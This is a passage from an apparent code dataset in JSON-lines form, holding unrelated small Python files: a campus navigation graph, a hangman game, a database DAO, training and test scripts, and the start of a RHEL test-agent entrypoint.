'West'}},\n\n 'Armory': {\n 'S. 5th Street-E. Armory': {'distance': 456, 'name': 'E. Armory', 'direction': 'North'}},\n\n 'Ice Arena': {\n 'S. 5th Street-E. Armory': {'distance': 60, 'name': 'S. 5th Street', 'direction': 'South'},\n 'S. 5th Street-E. Daniel': {'distance': 775, 'name': 'S. 5th Street', 'direction': 'North'}},\n\n 'Lincoln Hall': {\n 'E. Daniel-S. Wright Street': {'distance': 509, 'name': 'S. Wright Street', 'direction': 'North'}},\n\n 'Gregory Hall': {\n 'Lincoln Hall': {'distance': 402, 'name': 'S. Wright Street', 'direction': 'North'}},\n\n 'Psych Bldg': {\n 'S 6th Street-E. Armory': {'distance': 743, 'name': 'S. 6th Street', 'direction': 'South'},\n 'SPEECH AND HEARING SCIENCE': {'distance': 180, 'name': 'S. 6th Street', 'direction': 'North'}},\n\n 'Library & Information Sci': {\n 'S. 5th Street-E. Daniel': {'distance': 129, 'name': 'E. Daniel', 'direction': 'West'},\n 'S. 6th Street-E. Daniel': {'distance': 250, 'name': 'E. Daniel', 'direction': 'East'}},\n\n 'SPEECH AND HEARING SCIENCE': {\n 'Psych Bldg': {'distance': 120, 'name': 'S. 6th Street', 'direction': 'South'},\n 'S. 6th Street-E. Daniel': {'distance': 90, 'name': 'S. 6th Street', 'direction': 'North'}},\n\n 'Illini Union BookStore': {\n 'E. Daniel-S. Wright Street': {'distance': 117, 'name': 'S. Wright Street', 'direction': 'South'},\n 'Coble Hall': {'distance': 157, 'name': 'S. Wright Street', 'direction': 'North'}},\n\n 'Coble Hall': {\n 'Illini Union BookStore': {'distance': 157, 'name': 'S. Wright Street', 'direction': 'South'},\n 'Altgeld Hall': {'distance': 216, 'name': 'S. Wright Street', 'direction': 'North'}},\n\n 'Altgeld Hall': {\n 'Coble Hall': {'distance': 216, 'name': 'S. Wright Street', 'direction': 'South'},\n 'Illini Hall': {'distance': 136, 'name': 'S. Wright Street', 'direction': 'North'}},\n\n 'Illini Hall': {\n 'Altgeld Hall': {'distance': 136, 'name': 'S. Wright Street', 'direction': 'South'},\n 'Arcade Bldg': {'distance': 121, 'name': 'S. Wright Street', 'direction': 'North'}},\n\n 'Arcade Bldg': {\n 'Illini Hall': {'distance': 121, 'name': 'S. Wright Street', 'direction': 'South'},\n 'E. Green Street-S. Wright Street-W. Green Street': {'distance': 192, 'name': 'S. Wright Street',\n 'direction': 'North'}},\n\n 'School of Nursing': {\n 'S. Goodwin-W. Green Street': {'distance': 433, 'name': 'S. Goodwin Ave', 'direction': 'North'},\n 'Burrill Hall': {'distance': 435, 'name': 'S. Goodwin Ave', 'direction': 'South'}},\n\n 'Burrill Hall': {\n 'School of Nursing': {'distance': 197, 'name': 'S. Goodwin Ave', 'direction': 'North'},\n 'Chem & Life Sci Lab (CLSL)': {'distance': 849, 'name': 'S. Goodwin Ave', 'direction': 'South'}},\n\n 'Medical Sciences Building': {\n 'W. Green Street-S. Matthews Avenue': {'distance': 756, 'name': 'S. Matthews Avenue',\n 'direction': 'North'},\n 'Davenport Hall': {'distance': 478, 'name': 'S. Matthews Avenue', 'direction': 'South'}},\n\n 'Chem & Life Sci Lab (CLSL)': {\n 'Burrill Hall': {'distance': 543, 'name': 'S. Goodwin Ave', 'direction': 'North'},\n 'S. Goodwin-W. Oregon Street': {'distance': 387, 'name': 'S. Goodwin Ave', 'direction': 'South'}},\n\n 'S. Goodwin-W. Oregon Street': {\n 'Chem & Life Sci Lab (CLSL)': {'distance': 653, 'name': 'S. Goodwin Ave', 'direction': 'North'},\n 'S. Goodwin-W. Gregory': {'distance': 732, 'name': 'S. Goodwin Ave', 'direction': 'South'}},\n\n 'S. Goodwin-W. Gregory': {\n 'S. Goodwin-W. Oregon Street': {'distance': 885, 'name': 'S. Goodwin Ave', 'direction': 'North'},\n 'Undergrad Library': {'distance': 689, 'name': 'W. Gregory', 'direction': 'West'}},\n\n 'S. 6th Street-E. Gregory': {\n 'Undergrad Library': {'distance': 850, 'name': 'W. Gregory', 'direction': 'East'},\n 'S 6th Street-E. Armory': {'distance': 543, 'name': 'S. 6th Street', 'direction': 'North'}},\n\n 'S 6th Street-E. Armory': {\n 'S. 6th Street-E. Gregory': {'distance': 586, 'name': 'S. 6th Street', 'direction': 'South'},\n 'S. Wright Street-E. Armory': {'distance': 456, 'name': 'E. Armory Avenue', 'direction': 'East'},\n 'S. 5th Street-E. Armory': {'distance': 530, 'name': 'E. Armory Avenue', 'direction': 'West'},\n 'Psych Bldg': {'distance': 743, 'name': 'S. 6th Street', 'direction': 'North'}},\n\n 'S. 5th Street-E. Armory': {\n 'Armory': {'distance': 30, 'name': 'E. Armory Avenue', 'direction': 'South'},\n 'Ice Arena': {'distance': 60, 'name': 'S 5th Street', 'direction': 'North'},\n 'S 6th Street-E. Armory': {'distance': 530, 'name': 'E. Armory Avenue', 'direction': 'East'}},\n\n 'S. 5th Street-E. Daniel': {\n 'Ice Arena': {'distance': 879, 'name': 'S 5th Street', 'direction': 'South'},\n 'Library & Information Sci': {'distance': 190, 'name': 'E. Daniel', 'direction': 'East'}},\n\n 'S. 6th Street-E. Daniel': {\n 'Library & Information Sci': {'distance': 540, 'name': 'E. Daniel', 'direction': 'West'},\n 'SPEECH AND HEARING SCIENCE': {'distance': 190, 'name': 'S. 6th Street', 'direction': 'South'},\n 'E. Daniel-S. Wright Street': {'distance': 432, 'name': 'E. Daniel', 'direction': 'East'},\n 'E. Green-S. 6th Street': {'distance': 1296, 'name': 'S. 6th street', 'direction': 'North'}},\n\n 'E. Daniel-S. Wright Street': {\n 'Lincoln Hall': {'distance': 509, 'name': 'S. Wright Street', 'direction': 'South'},\n 'Illini Union BookStore': {'distance': 78, 'name': 'S. Wright Street', 'direction': 'North'},\n 'S. 6th Street-E. Daniel': {'distance': 432, 'name': 'E. Daniel', 'direction': 'West'}},\n\n 'S. Wright Street-E. Armory': {\n 'S 6th Street-E. Armory': {'distance': 417, 'name': 'E. Armory Avenue', 'direction': 'West'},\n 'Gregory Hall': {'distance': 405, 'name': 'S. Wright Street', 'direction': 'North'}},\n\n 'E. Green Street-S. Wright Street-W. Green Street': {\n 'Arcade Bldg': {'distance': 190, 'name': 'S. Wright Street', 'direction': 'South'},\n 'E. Green-S. 6th Street': {'distance': 446, 'name': 'E. Green Street', 'direction': 'West'},\n 'W. Green Street-S. Matthews Avenue': {'distance': 842, 'name': 'W. Green Street',\n 'direction': 'East'}},\n\n 'E. Green-S. 6th Street': {\n 'E. Green Street-S. Wright Street-W. Green Street': {'distance': 446, 'name': 'E. Green Street',\n 'direction': 'East'},\n 'S. 6th Street-E. Daniel': {'distance': 1296, 'name': 'S. 6th Street', 'direction': 'South'}},\n\n 'W. Green Street-S. Matthews Avenue': {\n 'Medical Sciences Building': {'distance': 754, 'name': 'S. Matthews Avenue', 'direction': 'South'},\n 'S. Goodwin-W. Green Street': {'distance': 589, 'name': 'W. Green Street', 'direction': 'East'},\n 'E. Green Street-S. Wright Street-W. Green Street': {'distance': 842, 'name': 'W. Green Street',\n 'direction': 'West'}},\n\n 'S. Goodwin-W. Green Street': {\n 'W. Green Street-S. Matthews Avenue': {'distance': 589, 'name': 'W. Green Street', 'direction': 'West'},\n 'School of Nursing': {'distance': 384, 'name': 'S. Goodwin', 'direction': 'South'}},\n }\n\n def add_building_nodes(self, G):\n \"\"\"\n This method takes a directed graph as input and adds all the buildings as the nodes.\n :param G: Takes a directed graph as input.\n :return: Returns a graph with all the building nodes added\n \"\"\"\n for name, attributes in self.buildings.items():\n G.add_node(name, address=attributes['address'], code=attributes['code'], access=attributes['access'])\n return (G)\n\n def add_intersection_nodes(self, G):\n \"\"\"\n This method takes a directed graph as input and adds all the intersections as the nodes.\n :param G: Takes a directed graph as input.\n :return: Returns a graph with all the intersection nodes added\n \"\"\"\n for name in self.intersections:\n G.add_node(name)\n return (G)\n\n def add_edges(self, G):\n \"\"\"\n This method takes a directed graph as input and adds all the possible edges between the nodes.\n :param G: Takes a directed graph as input.\n :return: Returns a graph with all the egdge between nodes added\n \"\"\"\n for node, adjacent in self.edges.items():\n for adjacent_node, adjacent_info in adjacent.items():\n G.add_edge(node, adjacent_node, distance=adjacent_info['distance'], name=adjacent_info['name'],\n direction=adjacent_info['direction'])\n return (G)\n\n def print_all_buildings(self, H) -> pd.DataFrame:\n \"\"\"\n This method prints out the building names sorted alphabetically\n :param H: Takes the complete graph with all the nodes and edges\n :return: A panda dataframe that has the building name and code for each building.\n \"\"\"\n buildings = H.node\n buildings_dataframe = pd.DataFrame()\n building_list = []\n code_list = []\n print(\"Following is the list of buildings you can navigate from/to:\")\n print(\"--------------------------------------------------------\")\n for key, value in sorted(buildings.items()):\n building_list.append(key)\n code_list.append(value['code'])\n buildings_dataframe['building'] = building_list\n buildings_dataframe['code'] = code_list\n print(buildings_dataframe)\n return (buildings_dataframe)\n\n def get_building_name(self, building_df, mail_code) -> str:\n \"\"\"\n This method prints out the building names corresponding to the input mail code\n :param building_df: A Panda dataframe holding all the building names and its corresponding the mail codes.\n :param mail_code: The mail code for a building\n :return: The building name corresponding to the mail code\n \"\"\"\n building_name = \"\"\n\n try:\n if (mail_code in building_df['code'].values):\n id_mail_box = int(building_df.index[building_df['code'] == mail_code].tolist()[0])\n building_name = building_df['building'].get_value(id_mail_box)\n else:\n print(\n \"Incorrect mailcode \" + mail_code + \" entered. Please check the list of mailcodes present in our list and retry!\")\n building_name = \"\"\n except Exception:\n print(\n \"Incorrect mailcode \" + mail_code + \" entered. Please check the list of mailcodes present in our list and retry!\")\n return building_name\n\n def print_shortest_path(self, H, shortest_path: list):\n \"\"\"\n This method prints out the shortest path between 2 building.\n :param H: A directed graph having all the possible buildings and edges between them.\n :param shortest_path: A list having the nodes in the shortest path between source and target.\n\n >>> test = nx.DiGraph()\n >>> test.add_node('Foreign Language Buildings')\n >>> test.add_node('Davenport Hall')\n >>> test.add_edge('Foreign Language Buildings','Davenport Hall',distance= 370,direction='North')\n >>> test.add_edge('Foreign Language Buildings','Observatory',distance= 10,direction='South')\n >>> test.add_edge('Observatory','Davenport Hall',distance= 25,direction='South')\n >>> test_b = BuildingGraph()\n >>> shortest_path=nx.shortest_path(test, 'Foreign Language Buildings', 'Davenport Hall', weight='distance')\n >>> test_b.print_shortest_path(test,shortest_path)\n Travel from Foreign Language Buildings to Davenport Hall\n Starting at S. Matthews Avenue, turn South\n At Observatory, turn South\n Proceed until you arrive at Davenport Hall\n \"\"\"\n\n nodes = H.nodes()\n edge_data = {}\n directions = \"Travel from \" + shortest_path[0] + \" to \" + shortest_path[-1]\n for name, attributes in self.buildings.items():\n if name == shortest_path[0]:\n directions = directions + \"\\nStarting at \" + attributes['access']\n edge_data[shortest_path[0]] = H.get_edge_data(shortest_path[0], shortest_path[1])\n for key, value in edge_data.items():\n directions = directions + \", turn \" + value['direction']\n for items in range(1, len(shortest_path) - 1):\n if (shortest_path[items] in nodes):\n edge_data[shortest_path[items]] = H.get_edge_data(shortest_path[items], shortest_path[items + 1])\n directions = directions + \"\\nAt \" + shortest_path[items]\n for key, value in edge_data.items():\n if (key == shortest_path[items]):\n directions = directions + \", turn \" + value['direction']\n directions = directions + \"\\nProceed until you arrive at \" + shortest_path[-1]\n print(directions)\n\n\nH = nx.DiGraph()\nBuildings = BuildingGraph()\nH = Buildings.add_building_nodes(H)\nb = Buildings.print_all_buildings(H)\nH = Buildings.add_intersection_nodes(H)\nH = Buildings.add_edges(H)\nwhile (True):\n user_input = input(\"Enter starting and ending mail codes\")\n user_data = user_input.split(\" \")\n user_data = [x.strip(' ') for x in user_data]\n source = Buildings.get_building_name(b, user_data[0])\n target = Buildings.get_building_name(b, user_data[1])\n if (source == target):\n print(\"You are already at the destination.Please choose some other destination!\")\n else:\n try:\n shortest_path = nx.shortest_path(H, source, target, weight='distance')\n Buildings.print_shortest_path(H, shortest_path)\n except Exception:\n print(\"The \" + target + \" is not reachable from the \" + source + \" .Please check again!\")\n flag = input(\"Do you wish to continue? Please type Y if you wish to continue and N if you wish to stop.\")\n if (flag == 'n' or flag == 'N'):\n break\n","sub_path":"Graph_testing.py","file_name":"Graph_testing.py","file_ext":"py","file_size_in_byte":20423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"528395731","text":"import sqlite3\nconn = sqlite3.connect('Test_DB.sqlite')\ncursor = conn.cursor()\n\n\ndef Write_to_SQL(data1, data2, data3):\n print(data1,data2,data3)\n cursor.execute(\"INSERT INTO Test VALUES(NULL, ?, ?, ?)\", (data1, data2, data3))\n conn.commit()\n\n#cursor.execute(\"SELECT Name FROM Artist ORDER BY Name LIMIT 3\")\n#results = cursor.fetchall()\n#print('SQL read =', results)\n\n\ncursor.execute('''CREATE TABLE Test (\n id INTEGER PRIMARY KEY ON CONFLICT ROLLBACK AUTOINCREMENT\n UNIQUE ON CONFLICT ROLLBACK\n NOT NULL,\n text1 TEXT NOT NULL,\n text2 TEXT,\n text3 TEXT);''')\n","sub_path":"SQL_worker.py","file_name":"SQL_worker.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"152188998","text":"from typing import Tuple, Optional, List\n\nimport asyncpg\n\nfrom src.internal.adapters.entities.error import Error\nfrom src.internal.adapters.enums.errors import ErrorEnum\nfrom src.internal.biz.dao.base_dao import BaseDao\nfrom src.internal.biz.entities.dish_main import DishMain\nfrom src.internal.biz.entities.menu_main import MenuMain\nfrom src.internal.biz.entities.menu_category import MenuCategory\nfrom src.internal.biz.entities.measure_unit import MeasureUnit\n\nMEASURE_UNIT_FKEY = 'dish_main_measure_unit_id_fkey'\nMENU_CATEGORY_FREY = 'dish_main_menu_category_id_fkey'\nMENU_MAIN_FREY = 'dish_main_menu_main_id_fkey'\n\n\nclass DishMainDao(BaseDao):\n async def add(self, dish_main: DishMain) -> Tuple[Optional[DishMain], Optional[Error]]:\n sql = \"\"\"\n INSERT INTO dish_main(name, photo_link, description, menu_main_id, menu_category_id, measure_unit_id)\n VALUES ($1, $2, $3, $4, $5, $6)\n RETURNING id;\n \"\"\"\n\n try:\n dish_main_id = await self.conn.fetchval(sql, dish_main.name, dish_main.photo.short_url,\n dish_main.description,\n dish_main.menu_main.id, dish_main.menu_category.id,\n dish_main.measure_unit.id)\n except asyncpg.exceptions.ForeignKeyViolationError as exc:\n if exc.constraint_name == MEASURE_UNIT_FKEY:\n return None, ErrorEnum.MEASURE_UNIT_DOESNT_EXISTS\n elif exc.constraint_name == MENU_CATEGORY_FREY:\n return None, ErrorEnum.MENU_CATEGORY_DOESNT_EXISTS\n elif exc.constraint_name == MENU_MAIN_FREY:\n return None, ErrorEnum.MENU_MAIN_DOESNT_EXISTS\n else:\n raise TypeError\n\n dish_main.id = dish_main_id\n return dish_main, None\n\n async def get(self, menu_id: int) -> Tuple[Optional[List[DishMain]], Optional[Error]]:\n sql = \"\"\"\n SELECT \n dish_main.id AS dish_main_id,\n dish_main.name AS dish_main_name,\n dish_main.photo_link AS dish_main_photo_link,\n dish_main.description AS dish_main_description,\n dish_main.menu_main_id\t\t\t\tAS dish_main_menu_main_id,\n dish_main.menu_category_id\t\t\tAS dish_main_menu_category_id,\n dish_main.measure_unit_id\t\t\tAS dish_main_measure_unit_id\n FROM \t\n dish_main\n WHERE \n dish_main.menu_main_id = $1\n \"\"\"\n if self.conn:\n data = await self.conn.fetch(sql, menu_id)\n else:\n async with self.pool.acquire() as conn:\n data = await conn.fetch(sql, menu_id)\n if not data:\n return None, ErrorEnum.DISHES_DOESNT_EXISTS\n dishes_main = [\n DishMain(\n id=data[i]['dish_main_id'],\n name=data[i]['dish_main_name'],\n photo=data[i]['dish_main_photo_link'],\n description=data[i]['dish_main_description'],\n menu_main=MenuMain(id=data[i]['dish_main_menu_main_id']),\n menu_category=MenuCategory(id=data[i]['dish_main_menu_category_id']),\n measure_unit=MeasureUnit(id=data[i]['dish_main_measure_unit_id']))\n for i in range(len(data))\n ]\n return dishes_main, None\n","sub_path":"services/core/src/internal/biz/dao/dish_main_dao.py","file_name":"dish_main_dao.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"122933160","text":"from models import model_utils\nfrom utils import eval_utils, time_utils\n\ndef train(args, loader, model, criterion, optimizer, log, epoch, recorder):\n model.train()\n log.printWrite('---- Start Training Epoch %d: %d batches ----' % (epoch, len(loader)))\n timer = time_utils.Timer(args.time_sync);\n\n for i, sample in enumerate(loader):\n data = model_utils.parseData(args, sample, timer, 'train')\n input = model_utils.getInput(args, data)\n pred = model(input); timer.updateTime('Forward')\n\n optimizer.zero_grad()\n loss = criterion.forward(pred, data); \n timer.updateTime('Crit');\n criterion.backward(); timer.updateTime('Backward')\n\n recorder.updateIter('train', loss.keys(), loss.values())\n\n optimizer.step(); timer.updateTime('Solver')\n\n iters = i + 1\n if iters % args.train_disp == 0:\n opt = {'split':'train', 'epoch':epoch, 'iters':iters, 'batch':len(loader), \n 'timer':timer, 'recorder': recorder}\n log.printItersSummary(opt)\n\n if iters % args.train_save == 0:\n results, recorder, nrow = prepareSave(args, data, pred, recorder, log) \n log.saveImgResults(results, 'train', epoch, iters, nrow=nrow)\n log.plotCurves(recorder, 'train', epoch=epoch, intv=args.train_disp)\n\n if args.max_train_iter > 0 and iters >= args.max_train_iter: break\n opt = {'split': 'train', 'epoch': epoch, 'recorder': recorder}\n log.printEpochSummary(opt)\n\ndef prepareSave(args, data, pred, recorder, log):\n results = [data['img'].data, data['m'].data, (data['n'].data+1)/2]\n if args.s1_est_d:\n l_acc, data['dir_err'] = eval_utils.calDirsAcc(data['dirs'].data, pred['dirs'].data, args.batch)\n recorder.updateIter('train', l_acc.keys(), l_acc.values())\n\n nrow = data['img'].shape[0] if data['img'].shape[0] <= 32 else 32\n return results, recorder, nrow\n","sub_path":"train_stage1.py","file_name":"train_stage1.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"385299833","text":"def lista_rotaciones(palabra):\n \"\"\"\n\n :param palabra: una palabra\n :return: lista de rotaciones (de caracteres) de la palabra\n \"\"\"\n\n lista = [palabra]\n\n for i in range(len(palabra)-1):\n temp = palabra[i+1: len(palabra)] + palabra[:i+1]\n lista.append(temp)\n\n return lista\n\n\n# ejecucion\nprint(lista_rotaciones(\"rotar\"))\n","sub_path":"Parcialitos/Primero/rotaciones_cadena.py","file_name":"rotaciones_cadena.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"365487796","text":"from .exceptions import *\nfrom random import randint\n\n# Complete with your own, just for fun :)\nLIST_OF_WORDS = [\"pineapple\", \"baseball\", \"computers\"]\n\n\ndef _get_random_word(list_of_words):\n if len(list_of_words) == 0:\n raise InvalidListOfWordsException(\"The List of words is empty\")\n \n rand = randint(0, len(list_of_words)-1)\n return list_of_words[rand]\n\n\ndef _mask_word(word):\n if len(word) == 0:\n raise InvalidWordException(\"Your word does not exist\")\n \n masked = len(word) * \"*\"\n return masked\n\n\ndef _uncover_word(answer_word, masked_word, character):\n if len(answer_word) == 0 or len(masked_word) == 0 or len(masked_word) != len(answer_word):\n raise InvalidWordException(\"Your words do not exist or are not the same\")\n \n if len(character) != 1:\n raise InvalidGuessedLetterException(\"Guess with a single character\")\n \n index_list = [i for i, ltr in enumerate(answer_word) if ltr.lower() == character.lower()]\n for i in index_list:\n masked_word = masked_word[:i] + character + masked_word[i+1:]\n return masked_word.lower()\n \n\n\ndef guess_letter(game, letter):\n if game[\"masked_word\"] == game[\"answer_word\"] or game[\"remaining_misses\"] == 0:\n raise GameFinishedException(\"The Game is Already Over!\")\n \n \n if letter.lower() in game[\"answer_word\"] or letter.upper() in game[\"answer_word\"]:\n game[\"masked_word\"] = _uncover_word(game[\"answer_word\"], game[\"masked_word\"], letter)\n \n if game[\"masked_word\"] == game[\"answer_word\"]:\n raise GameWonException(\"You Won!\")\n else:\n game[\"remaining_misses\"] -= 1\n if game[\"remaining_misses\"] == 0:\n raise GameLostException(\"You Lost :(\")\n game[\"previous_guesses\"].append(letter.lower())\n \n\n\ndef start_new_game(list_of_words=None, number_of_guesses=5):\n if list_of_words is None:\n list_of_words = LIST_OF_WORDS\n\n word_to_guess = _get_random_word(list_of_words)\n masked_word = _mask_word(word_to_guess)\n game = {\n 'answer_word': word_to_guess,\n 'masked_word': masked_word,\n 'previous_guesses': [],\n 'remaining_misses': number_of_guesses,\n }\n\n return game\n","sub_path":"hangman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"510430754","text":"import unittest\nfrom selenium import webdriver\n\nclass Typo(unittest.TestCase):\n def setUp(self):\n self.base_url = 'http://the-internet.herokuapp.com/'\n self.typo_url = self.base_url + 'typos'\n self.driver = webdriver.Chrome(executable_path=r'/Applications/TestFiles/chromedriver')\n\n def test_typo_first_paragraph(self):\n first_paragraph_path = '//*[@id=\"content\"]/div/p[1]'\n # first_paragraph_expected_text = \"This example demonstrates a typo being introduced. It does it randomly on each page load.\"\n driver = self.driver\n driver.get(self.typo_url)\n\n first_parapraph = self.driver.find_element_by_xpath(first_paragraph_path).text\n # self.assertEqual(first_parapraph, first_paragraph_expected_text,\n # f'Houston, we have a typo here! In first paragraph')\n if first_parapraph == \"This example demonstrates a typo being introduced. It does it randomly on each page load.\":\n print('No typos in first paragraph')\n else:\n print(f'Houston, we have a typo here! In the first paragraph: {first_parapraph}')\n\n\n def test_typo_second_paragraph(self):\n second_paragraph_path = '//*[@id=\"content\"]/div/p[2]'\n # second_paragraph_expected_text = \"Sometimes you'll see a typo, other times you won't.\"\n driver = self.driver\n driver.get(self.typo_url)\n\n second_paragraph = driver.find_element_by_xpath(second_paragraph_path).text\n # self.assertEqual(second_paragraph, second_paragraph_expected_text,\n # f'Houston, we have a typo here! In second paragraph')\n if second_paragraph == \"Sometimes you'll see a typo, other times you won't.\":\n print('No typos in second paragraph')\n else:\n print(f'Houston, we have a typo here! In the second paragraph: {second_paragraph}')\n\n\n def tearDown(self):\n self.driver.quit()\n\n \"\"\"Both tests may be run twice or 3 times so You can see if indeed there is a typo.\n We can use assertion or If statement\n \"\"\"","sub_path":"features/typo.py","file_name":"typo.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"629555078","text":"\"\"\"\nTests for the Flexibiliy environment\n\"\"\"\nimport os\nimport pandas as pd\nimport numpy as np\nfrom energy_py.envs import FlexEnv\n\ndata_path = os.path.join(os.getcwd(), 'data')\n\nenv = FlexEnv(data_path=data_path,\n flex_size=1,\n flex_time=6,\n relax_time=12,\n flex_effy=1.2)\n\nstate = pd.read_csv('data/state.csv', index_col=0, parse_dates=True)\n\nprices = state.values\n\ndef test_down_up():\n o = env.reset()\n rews = []\n for step in range(30):\n\n if step == 5:\n o, r, d, i = env.step(np.array(1).reshape(1, 1))\n\n else:\n o, r, d, i = env.step(np.array(0).reshape(1, 1))\n\n rews.append(r)\n\n expected_rew = (np.sum(prices[5:5+6]) - np.sum(prices[5+6:5+6+6])*1.2) / 12\n assert np.isclose(sum(rews), expected_rew)\n\n\ndef test_up_down():\n o = env.reset()\n rews = []\n for step in range(30):\n\n if step == 6:\n o, r, d, i = env.step(np.array(2).reshape(1, 1))\n\n else:\n o, r, d, i = env.step(np.array(0).reshape(1, 1))\n\n rews.append(r)\n\n expected_rew = (-1.2*np.sum(prices[6:6+6]) + np.sum(prices[6+6:6+12])) / 12\n assert np.isclose(sum(rews), expected_rew)\n\n\nif __name__ == '__main__':\n test_down_up()\n test_up_down()\n","sub_path":"cloudnoreplay/energy_py/tests/test_flex.py","file_name":"test_flex.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"634588285","text":"# https://en.wikibooks.org/wiki/Data_Structures/Stacks_and_Queues\n# http://interactivepython.org/courselib/static/pythonds/BasicDS/ImplementingaStackinPython.html\n'''\nImplement the functions of the stack data structure. Stacks are a basic data structure.\nWhen we add an element we say we push it on to the stack.\nWhen we remove (pop) an element from the stack it is aways the top element.\nA real world analogy is a stack of plates in a sink. When we add a new plate its\nis placed on top of the stack, when we wash a plate we always take the one\non top and remove it from the stack. This principle of operation is also\nknown as LIFO (Last In First Out).\nImplement the following functions.\n(a) push(list,x) - Push element x to list. Return list.\n(b) pop(list) - Pop top element from list and return it.\n(c) head(list) - Return the top element from list without removing it.\n'''\n\nalex_list = [1, 2, 3, 4, 5]\n\n\ndef push(my_list, x):\n my_list.append(x)\n return my_list\n\n\ndef pop(my_list):\n popped_element = my_list.pop()\n return f\"The popped element is: {popped_element}\"\n\n\ndef head(my_list):\n return my_list[-1]\n\n\npop(alex_list) # Remove the last element (5)\npush(alex_list, 0) # Append 0 at the end of the stack/list\nprint(alex_list) # Printing the list to see what has happened\n# The modifications from the functions are saved !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\nprint(head(alex_list)) # Returns the last element of the list\nprint(pop(alex_list)) # Removes and returns the last element of the list\nprint(alex_list)\n","sub_path":"Python/Python Fundamentals/5.Data Structures and Built-In Functions/3. Programming Questions/Exercise 1 (Stack).py","file_name":"Exercise 1 (Stack).py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"102548951","text":"#\n# Shortest Distance to a Character\n#\n# Given a string S and a character C, return an array corresponding to the\n# shortest distance from each index to an index which holds C in S.\n#\n# Joel Rorseth\n#\n\ndef shortestToChar(S, C):\n\n e_indices = [i for i, ch in enumerate(S) if ch == C]\n dist = []\n e_ptr = 0\n pleft = None\n pright = e_indices[e_ptr]\n\n for i in range(len(S)):\n\n if S[i] == C:\n dist.append(0)\n pleft = pright\n e_ptr += 1\n pright = e_indices[e_ptr] if (e_ptr < len(e_indices)) else None\n\n else:\n if pleft == None:\n dist.append(abs(pright-i))\n elif pright == None:\n dist.append(abs(pleft-i))\n else:\n dist.append(min( abs(pleft-i), abs(pright-i) ))\n\n return dist\n\n\n\n\n# Driver\ns = \"abcdeeeefghijklme\"\nc = \"e\"\nprint(\"Given \\\"\" + s + \"\\\" and \\'\" + c + \"\\', shortest distances:\")\nprint(shortestToChar(s,c))\n","sub_path":"shortest_dist_to_char.py","file_name":"shortest_dist_to_char.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"224222309","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nEntrypoint for dci-rhel-agent.\nExample for settings.yml:\nlocal_repo: /var/www/html\nlocal_repo_ip: 192.168.1.1\ntopics:\n - topic: RHEL-7.6\n archs:\n - x86_64\n - ppc64le\n variants:\n - Server\n dci_rhel_agent_cert: false\n dci_rhel_agent_cki: false\n systems:\n - fqdn: labvm-1.novalocal\n kernel_options: \"rd.iscsi.ibft=1\"\n ks_meta: \"ignoredisk=--only-use=sda\"\n sol_command: \"ipmitool -I lanplus -U root -P calvin -H labvm-1.novalocal sol activate\"\n watchdog_timeout: 3600\n - labvm-2.novalocal\n\n - topic: RHEL-8.1\n archs:\n - ppc64le\n variants:\n - BaseOS\n - AppStream\n dci_rhel-agent_cert: false\n dci_rhel-agent_cki: false\n systems:\n - SUT3\n - SUT4\n\"\"\"\nimport ansible_runner\nimport signal\nimport sys\nimport yaml\n\nfrom os import environ\n\nnumber_of_failed_jobs = 0\n\ndef sigterm_handler(signal, frame):\n # This does NOT work with ansible_runner.run_async().\n print('Handle podman stop here !')\n sys.exit(0)\n\nsignal.signal(signal.SIGTERM, sigterm_handler)\n\ndef load_settings():\n with open('/etc/dci-rhel-agent/settings.yml', 'r') as settings:\n try:\n return(yaml.load(settings, Loader=yaml.SafeLoader))\n except yaml.YAMLError as exc:\n print(exc)\n sys.exit(1)\n\ndef provision_and_test(extravars):\n # Path is static in the container\n # local_repo = '/var/www/html'\n # extravars['local_repo'] = local_repo\n\n if 'topic' in extravars.keys():\n print (\"Topic is %s\" % extravars['topic'])\n else:\n print (\"Error ! No topic found in settings.\")\n sys.exit(1)\n\n # Provision and install SUT\n if 'systems' not in extravars.keys():\n print ('No hosts found in settings. Please add systems to provision and/or test to your settings file.')\n sys.exit(1)\n\n # Setup conserver if a sol_command exist\n if [system for system in extravars['systems'] if type(system) is dict and 'sol_command' in system.keys()]:\n systems = {'systems' : [system for system in extravars['systems'] if type(system) is dict and 'sol_command' in system.keys()]}\n r = ansible_runner.run(\n private_data_dir=\"/usr/share/dci-rhel-agent/\",\n inventory=\"/etc/dci-rhel-agent/inventory\",\n verbosity=1,\n playbook=\"conserver.yml\",\n extravars=systems,\n quiet=False\n )\n if r.rc != 0:\n print (\"Conserver playbook failed. {}: {}\".format(r.status, r.rc))\n sys.exit(1)\n\n threads_runners = {}\n for system in extravars['systems']:\n if type(system) is dict and 'fqdn' in system :\n extravars['fqdn'] = system['fqdn']\n if 'kernel_options' in system:\n extravars['kernel_options'] = system['kernel_options']\n else:\n extravars.pop('kernel_options', None)\n if 'ks_meta' in system:\n extravars['ks_meta'] = system['ks_meta']\n else:\n extravars.pop('ks_meta', None)\n if 'sol_command' in system:\n extravars['sol_command'] = system['sol_command']\n else:\n 